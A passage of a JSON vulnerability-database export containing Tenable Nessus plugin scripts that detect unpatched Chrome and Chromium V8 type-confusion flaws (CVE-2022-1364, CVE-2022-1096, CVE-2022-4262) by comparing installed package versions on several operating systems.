"https://www.tenable.com/plugins/nessus/159766", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159766);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a25ea27b-bced-11ec-87b5-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the a25ea27b-bced-11ec-87b5-3065ec8fd3ec advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d51f41d\");\n # https://vuxml.freebsd.org/freebsd/a25ea27b-bced-11ec-87b5-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?665a7dd9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<100.0.4896.127'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:05:06", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2022:0114-1 advisory.\n\n - Type Confusion in V8. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-20T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : chromium (openSUSE-SU-2022:0114-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-0114-1.NASL", "href": "https://www.tenable.com/plugins/nessus/160016", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:0114-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160016);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n\n script_name(english:\"openSUSE 15 Security Update : chromium (openSUSE-SU-2022:0114-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:0114-1 advisory.\n\n - Type Confusion in V8. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1198509\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/G5YYTVAL4HMIDBKVGBDTZND7UELHVRC2/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3ddb6880\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-1364\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromedriver and / or chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'chromedriver-100.0.4896.127-bp153.2.85.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-100.0.4896.127-bp153.2.85.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-100.0.4896.127-bp153.2.85.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-100.0.4896.127-bp153.2.85.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromedriver / chromium');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:06:38", "description": "The version of Google Chrome installed on the remote macOS host is prior to 100.0.4896.127. It is, therefore, affected by a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 100.0.4896.127 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_100_0_4896_127.NASL", "href": "https://www.tenable.com/plugins/nessus/159740", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159740);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n\n script_name(english:\"Google Chrome < 100.0.4896.127 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 100.0.4896.127. It is, therefore, affected\nby a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d51f41d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1315901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 100.0.4896.127 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'100.0.4896.127', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:26:08", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 323f900d-ac6d-11ec-a0b8-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-26T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- V8 type confusion (323f900d-ac6d-11ec-a0b8-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/159238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159238);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"FreeBSD : chromium -- V8 type confusion (323f900d-ac6d-11ec-a0b8-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 323f900d-ac6d-11ec-a0b8-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n # https://vuxml.freebsd.org/freebsd/323f900d-ac6d-11ec-a0b8-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff16c010\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<99.0.4844.84'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:31", "description": "The version of Google Chrome installed on the remote Windows host is prior to 108.0.5359.94. It is, therefore, affected by a vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-02T00:00:00", "type": "nessus", "title": "Google Chrome < 108.0.5359.94 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_108_0_5359_94.NASL", "href": "https://www.tenable.com/plugins/nessus/168372", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168372);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"Google Chrome < 108.0.5359.94 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 108.0.5359.94. It is, therefore, affected\nby a vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11d8a245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1394403\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 108.0.5359.94 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'108.0.5359.94', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:16:05", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5110 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-28T00:00:00", "type": "nessus", "title": "Debian DSA-5110-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5110.NASL", "href": "https://www.tenable.com/plugins/nessus/159269", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5110. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159269);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Debian DSA-5110-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5110\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", 